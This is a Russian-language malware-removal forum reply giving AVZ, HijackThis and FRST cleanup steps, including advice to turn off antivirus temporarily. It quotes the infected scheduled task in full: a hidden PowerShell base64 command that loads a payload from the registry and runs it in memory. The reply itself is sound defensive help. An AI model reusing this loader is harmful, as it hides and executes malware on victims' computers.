[akok]

Закройте все программы, временно выгрузите антивирус, файрволл и прочее защитное ПО.

Выполните скрипт в АВЗ (Файл - Выполнить скрипт):

Код:

begin
 ExecuteFile('schtasks.exe', '/delete /TN "e65780eb-49e8-571a-2730d5fdb9cbc9ac" /F', 0, 15000, true);
RebootWindows(false);
end.

Компьютер перезагрузится. После перезагрузки, выполните такой скрипт:

Код:

begin
CreateQurantineArchive(GetAVZDirectory+'quarantine.zip'); 
end.

Файл quarantine.zip из папки с распакованной утилитой AVZ отправьте с помощью этой формы или (если размер архива превышает 8 MB) на этот почтовый ящик: quarantine <at> safezone.cc (замените <at> на @) с указанием ссылки на тему в теме (заголовке) сообщения и с указанием пароля: virus в теле письма.

"Пофиксите" в HijackThis (некоторые строки могут отсутствовать):

Код:

O22 - Task: e65780eb-49e8-571a-2730d5fdb9cbc9ac - C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe -NonInteractive -WindowStyle Hidden -EncodedCommand JABTAEUAZgA4AGMAYQBXAGoAIAA9ACAAIgBIAEsATABNADoAXABTAG8AZgB0AHcAYQByAGUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABDAHUAcgByAGUAbgB0AFYAZQByAHMAaQBvAG4AXABTAGgAZQBsAGwAIgA7ACQAbABaADcAVgBnAEwAegB0AEgAIAA9ACAAIgB7AEYAMAA1AEMANQA0AEEANwAtADQAQQAzADMALQA1AEYANQA0AC0AQQAzADQAMABDAEQAQQA4AEIARgA1ADAAQgAxADMANQB9ACIAOwBmAHUAbgBjAHQAaQBvAG4AIABvAGcAYgBlAGgASgBGAHIAdgBpAHsAUABhAHIAYQBtACgAWwBPAHUAdABwAHUAdABUAHkAcABlACgAWwBUAHkAcABlAF0AKQBdAFsAUABhAHIAYQBtAGUAdABlAHIAKAAgAFAAbwBzAGkAdABpAG8AbgAgAD0AIAAwACkAXQBbAFQAeQBwAGUAWwBdAF0AJABqAGIAdgBJADYAawBBAFEAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAVAB5AHAAZQBbAF0AKAAwACkAKQAsAFsAUABhAHIAYQBtAGUAdABlAHIAKAAgAFAAbwBzAGkAdABpAG8AbgAgAD0AIAAxACAAKQBdAFsAVAB5AHAAZQBdACQAVABuAGwAcABxAEYAIAA9ACAAWwBWAG8AaQBkAF0AKQAkAFMARABhAFIAZgA0ACAAPQAgAFsAQQBwAHAARABvAG0AYQBpAG4AXQA6ADoAQwB1AHIAcgBlAG4AdABEAG8AbQBhAGkAbgA7ACQAZwBWADIAYwBqADYAdgBEACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkATgBhAG0AZQAoACcAUgBlAGYAbABlAGMAdABlAGQARABlAGwAZQBnAGEAdABlACcAKQA7ACQAawBvAFEAUABNAGoANQAgAD0AIAAkAFMARABhAFIAZgA0AC4ARABlAGYAaQBuAGUARAB5AG4AYQBtAGkAYwBBAHMAcwBlAG0AYgBsAHkAKAAkAGcAVgAyAGMAagA2AHYARAAsACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBFAG0AaQB0AC4AQQBzAHMAZQBtAGIAbAB5AEIAdQBpAGwAZABlAHIAQQBjAGMAZQBzAHMAXQA6ADoAUgB1AG4AKQA7ACQAbQBRAFEAWQBmAFcAIAA9ACAAJABrAG8AUQBQAE0AagA1AC4ARABlAGYAaQBuAGUARAB5AG4AYQBtAGkAYwBNAG8AZAB1AGwAZQAoACcASQBuAE0AZQBtAG8AcgB5AE0AbwBkAHUAbABlACcALAAgACQAZgBhAGwAcwBlACkAOwAkAE8AUwBlAHAAbQAzAFUAIAA9ACAAJABtAFEAUQBZAGYAVwAuAEQAZQBmAGkAbgBlAFQAeQBwAGUAKAAnAE0AeQBEAGUAbABlAGcAYQB0AGUAVAB5AHAAZQAnACwAIAAnAEMAbABhAHMAcwAsACAAUAB1AGIAbABpAGMALAAgAFMAZQBhAGwAZQBkACwAIABBAG4AcwBpAEMAbABhAHMAcwAsACAAQQB1AHQAbwBDAGwAYQBzAHMAJwAsACAAWwBTAHkAcwB0AGUAbQAuAE0AdQBsAHQAaQBjAGEAcwB0AEQAZQBsAGUAZwBhAHQAZQBdACkAOwAkAEcAZQB0AE4ATQBEADAAVwAgAD0AIAAkAE8AUwBlAHAAbQAzAFUALgBEAGUAZgBpAG4AZQBDAG8AbgBzAHQAcgB1AGMAdABvAHIAKAAnAFIAVABTAHAAZQBjAGkAYQBsAE4AYQBtAGUALAAgAEgAaQBkAGUAQgB5AFMAaQBnACwAIABQAHUAYgBsAGkAYwAnACwAIABbAFMAeQBzAHQAZQBtAC4AUgBlAGYAbABlAGMAdABpAG8AbgAuAEMAYQBsAGwAaQBuAGcAQwBvAG4AdgBlAG4AdABpAG8AbgBzAF0AOgA6AFMAdABhAG4AZABhAHIAZAAsACAAJABqAGIAdgBJADYAawBBAFEAKQA7ACQARwBlAHQATgBNAEQAMABXAC4AUwBlAHQASQBtAHAAbABlAG0AZQBuAHQAYQB0AGkAbwBuAEYAbABhAGcAcwAoACcAUgB1AG4AdABpAG0AZQAsACAATQBhAG4AYQBnAGUAZAAnACkAOwAkAEsAQgBCAFAAVQBVAFAAIAA9ACAAJABPAFMAZQBwAG0AMwBVAC4ARABlAGYAaQBuAGUATQBlAHQAaABvAGQAKAAnAEkAbgB2AG8AawBlACcALAAgACcAUAB1AGIAbABpAGMALAAgAEgAaQBkAGUAQgB5AFMAaQBnACwAIABOAGUAdwBTAGwAbwB0ACwAIABWAGkAcgB0AHUAYQBsACcALAAgACQAVABuAGwAcABxAEYALAAgACQAagBiAHYASQA2AGsAQQBRACkAOwAkAEsAQgBCAFAAVQBVAFAALgBTAGUAdABJAG0AcABsAGUAbQBlAG4AdABhAHQAaQBvAG4ARgBsAGEAZwBzACgAJwBSAHUAbgB0AGkAbQBlACwAIABNAGEAbgBhAGcAZQBkACcAKQA7AFcAcgBpAHQAZQAtAE8AdQB0AHAAdQB0ACAAJABPAFMAZQBwAG0AMwBVAC4AQwByAGUAYQB0AGUAVAB5AHAAZQAoACkAOwB9AGYAdQBuAGMAdABpAG8AbgAgAEUANgA2AGkAYQBQAEcANQAoACQAbQBzAEwAUABBAEIALAAgACQAcgA5AGQAcgA4ADgAKQAgAHsAJAB5AGMAUABVAHgAIAAgAD0AIAAkAG0AcwBMAFAAQQBCAFsAJAByADkAZAByADgAOAArADAAXQAgACoAIAAxADYANwA3ADcAMgAxADYAOwAkAHkAYwBQAFUAeAAgACsAPQAgACQAbQBzAEwAUABBAEIAWwAkAHIAOQBkAHIAOAA4ACsAMQBdACAAKgAgADYANQA1ADMANgA7ACQAeQBjAFAAVQB4ACAAKwA9ACAAJABtAHMATABQAEEAQgBbACQAcgA5AGQAcgA4ADgAKwAyAF0AIAAqACAAMgA1ADYAOwAkAHkAYwBQAFUAeAAgACsAPQAgACQAbQBzAEwAUABBAEIAWwAkAHIAOQBkAHIAOAA4ACsAMwBdACAAKgAgADEAOwByAGUAdAB1AHIAbgAgACQAeQBjAFAAVQB4ADsAfQAkAHcARgBOAGMASgBwAEcAWAAgAD0AIABAACIACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEcAZQB0AEMAdQByAHIAZQBuAHQAUAByAG8AYwBlAHMAcwAoACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgASQBuAHQAUAB0AHIAIABsAHAAQQBkAGQAcgBlAHMAcwAsACAAdQBpAG4AdAAgAGQAdwBTAGkAegBlACwAIAB1AGkAbgB0ACAAZgBsAEEAbABsAG8AYwBhAHQAaQBvAG4AVAB5AHAAZQAsACAAdQBpAG4AdAAgAGYAbABQAHIAbwB0AGUAYwB0ACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABiAG8AbwBsACAAVwByAGkAdABlAFAAcgBvAGMAZQBzAHMATQBlAG0AbwByAHkAKABJAG4AdABQAHQAcgAgAHAAcgBvAGMAZQBzAHMALAAgAEkAbgB0AFAAdAByACAAYQBkAGQAcgBlAHMAcwAsACAAYgB5AHQAZQBbAF0AIABiAHUAZgBmAGUAcgAsACAAdQBpAG4AdAAgAHMAaQB6AGUALAAgAHUAaQBuAHQAIAB3AHIAaQB0AHQAZQBuACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIAB1AGkAbgB0ACAAUwBlAHQARQByAHIAbwByAE0AbwBkAGUAKAB1AGkAbgB0ACAAdQBNAG8AZABlACkAOwAKACIAQAAKACQAWABmADcAaQBJADIAIAA9ACAAQQBkAGQALQBUAHkAcABlACAALQBtAGUAbQBiAGUAcgBEAGUAZgBpAG4AaQB0AGkAbwBuACAAJAB3AEYATgBjAEoAcABHAFgAIAAtAE4AYQBtAGUAIAAiAFcAaQBuADMAMgAiACAALQBuAGEAbQBlAHMAcABhAGMAZQAgAFcAaQBuADMAMgBGAHUAbgBjAHQAaQBvAG4AcwAgAC0AcABhAHMAcwB0AGgAcgB1ADsAZgB1AG4AYwB0AGkAbwBuACAATwBhAEkAOQBaAEcAYQBpAGcANQAoACQAdwBGAE4AYwBKAHAARwBYACwAIAAkAGQAQQBhAHUAMQAsACAAJABNADUAaABEADEAcgBZACkAIAB7ACQAcgA5AFAAUwBIACAAPQAgACQAWABmADcAaQBJADIAOgA6AEcAZQB0AEMAdQByAHIAZQBuAHQAUAByAG8AYwBlAHMAcwAoACkAOwAkAGgATwBWAEkAUABIACAAPQAgACQAWABmADcAaQBJADIAOgA6AFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgAMAAsACQAdwBGAE4AYwBKAHAARwBYAC4ATABlAG4AZwB0AGgALAAwAHgAMAAwADAAMAAzADAAMAAwACwAMAB4ADQAMAApADsAJABLAHAAZgBhAEIAYwBnAHQAUwAgAD0AIAAkAFgAZgA3AGkASQAyADoAOgBWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoADAALAAkAE0ANQBoAEQAMQByAFkALgBMAGUAbgBnAHQAaAAsADAAeAAwADAAMAAwADMAMAAwADAALAAwAHgANAAwACkAOwAkAFgAZgA3AGkASQAyADoAOgBXAHIAaQB0AGUAUAByAG8AYwBlAHMAcwBNAGUAbQBvAHIAeQAoACQAcgA5AFAAUwBIACwAIAAkAGgATwBWAEkAUABIACwAIAAkAHcARgBOAGMASgBwAEcAWAAsACAAJAB3AEYATgBjAEoAcABHAFgALgBMAGUAbgBnAHQAaAAsACAAMAApACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7ACQAWABmADcAaQBJADIAOgA6AFcAcgBpAHQAZQBQAHIAbwBjAGUAcwBzAE0AZQBtAG8AcgB5ACgAJAByADkAUABTAEgALAAgACQASwBwAGYAYQBCAGMAZwB0AFMALAAgACQATQA1AGgARAAxAHIAWQAsACAAJABNADUAaABEADEAcgBZAC4ATABlAG4AZwB0AGgALAAgADAAKQAgAHwAIABPAHUAdAAtAE4AdQBsAGwAOwAkAE0ATgBaAGgAaAB2ACAAPQAgAFsASQBuAHQAUAB0AHIAXQAoACQAaABPAFYASQBQAEgALgBUAG8ASQBuAHQANgA0ACgAKQArACQAZABBAGEAdQAxACkAOwAkAEoAagBtAE8AVgAgAD0AIABvAGcAYgBlAGgASgBGAHIAdgBpACAAQAAoAFsASQBuAHQAUAB0AHIAXQAsACAAWwBJAG4AdABQAHQAcgBdACkAIAAoAFsAVgBvAGkAZABdACkAOwAkAEQARgBBAGgAeQBNACAAPQAgAFsAUwB5AHMAdABlAG0ALgBSAHUAbgB0AGkAbQBlAC4ASQBuAHQAZQByAG8AcABTAGUAcgB2AGkAYwBlAHMALgBNAGEAcgBzAGgAYQBsAF0AOgA6AEcAZQB0AEQAZQBsAGUAZwBhAHQAZQBGAG8AcgBGAHUAbgBjAHQAaQBvAG4AUABvAGkAbgB0AGUAcgAoACQATQBOAFoAaABoAHYALAAgACQASgBqAG0ATwBWACkAOwAkAFgAZgA3AGkASQAyADoAOgBTAGUAdABFAHIAcgBvAHIATQBvAGQAZQAoADAAeAA4ADAAMAA2ACkAIAB8ACAATwB1AHQALQBOAHUAbABsADsAJABEAEYAQQBoAHkATQAuAEkAbgB2AG8AawBlACgAJABLAHAAZgBhAEIAYwBnAHQAUwAsACAAJABoAE8AVgBJAFAASAApADsAfQBmAHUAbgBjAHQAaQBvAG4AIABpAFAAcABLAFIAbgA4AFkAUwAoACQAdwBpAEkAdgBkAFQAawA5AHEAeAAsACAAJABYAEEAMQBwAGEAKQAgAHsAJABJAGEAaABUAHIAIAA9ACAARQA2ADYAaQBhAFAARwA1ACAAJAB3AGkASQB2AGQAVABrADkAcQB4ACAAMQA7ACQAbQBpADAATABTAHQAMQBBACAAPQAgADUAOwB3AGgAaQBsAGUAIAAoACQAbQBpADAATABTAHQAMQBBACsAOAAgAC0AbAB0ACAAJABJAGEAaABUAHIAKQAgAHsAJABRAGgAZQBSAEIANgBqADYAIAA9ACAAJAB3AGkASQB2AGQAVABrADkAcQB4AFsAJABtAGkAMABMAFMAdAAxAEEAXQA7ACQAegAyAGkAMgBDAEIAdgBUAFoARwAgAD0AIABFADYANgBpAGEAUABHADUAIAAkAHcAaQBJAHYAZABUAGsAOQBxAHgAIAAoACQAbQBpADAATABTAHQAMQBBACsAMQApADsAJABVAEEAYQBJAGoAbwAxAFMAcwBhACAAPQAgAEUANgA2AGkAYQBQAEcANQAgACQAdwBpAEkAdgBkAFQAawA5AHEAeAAgACgAJABtAGkAMABMAFMAdAAxAEEAKwA1ACkAOwAkAG0AaQAwAEwAUwB0ADEAQQAgACsAPQAgADkAOwBpAGYAIAAoACQAUQBoAGUAUgBCADYAagA2ACAALQBlAHEAIAAkAFgAQQAxAHAAYQApACAAewBPAGEASQA5AFoARwBhAGkAZwA1ACAAJAB3AGkASQB2AGQAVABrADkAcQB4AFsAJABtAGkAMABMAFMAdAAxAEEALgAuACgAJABtAGkAMABMAFMAdAAxAEEAKwAkAHoAMgBpADIAQwBCAHYAVABaAEcAKQBdACAAJABVAEEAYQBJAGoAbwAxAFMAcwBhACAAJAB3AGkASQB2AGQAVABrADkAcQB4ADsAYgByAGUAYQBrADsAfQAgAGUAbABzAGUAIAB7ACQAbQBpADAATABTAHQAMQBBACAAKwA9ACAAJAB6ADIAaQAyAEMAQgB2AFQAWgBHADsAfQB9AH0AJABuAGEATwA1AGYAbgAgAD0AIAAoAEcAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAiACQAUwBFAGYAOABjAGEAVwBqACIAIAAtAE4AYQBtAGUAIAAiACQAbABaADcAVgBnAEwAegB0AEgAIgApAC4AJABsAFoANwBWAGcATAB6AHQASAA7ACQAdwBpAEkAdgBkAFQAawA5AHEAeAAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABuAGEATwA1AGYAbgApADsAJAB3AGkASQB2AGQAVABrADkAcQB4AFsAMABdACAAPQAgADAAOwBpAGYAIAAoAFsASQBuAHQAUAB0AHIAXQA6ADoAUwBpAHoAZQAgAC0AZQBxACAAOAApACAAewBpAFAAcABLAFIAbgA4AFkAUwAgACQAdwBpAEkAdgBkAFQAawA5AHEAeAAgADIAOwB9ACAAZQBsAHMAZQAgAHsAaQBQAHAASwBSAG4AOABZAFMAIAAkAHcAaQBJAHYAZABUAGsAOQBxAHgAIAAxADsAfQAKAA==

Скачайте Farbar Recovery Scan Tool и сохраните на Рабочем столе.

Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.
Запустите программу. Когда программа запустится, нажмите Yes для соглашения с предупреждением.
Отметьте галочкой также "Shortcut.txt".

Нажмите кнопку Scan.
После окончания сканирования будут созданы отчеты FRST.txt, Addition.txt, Shortcut.txt в той же папке, откуда была запущена программа. Прикрепите отчеты к своему следующему сообщению.
Подробнее читайте в этом руководстве.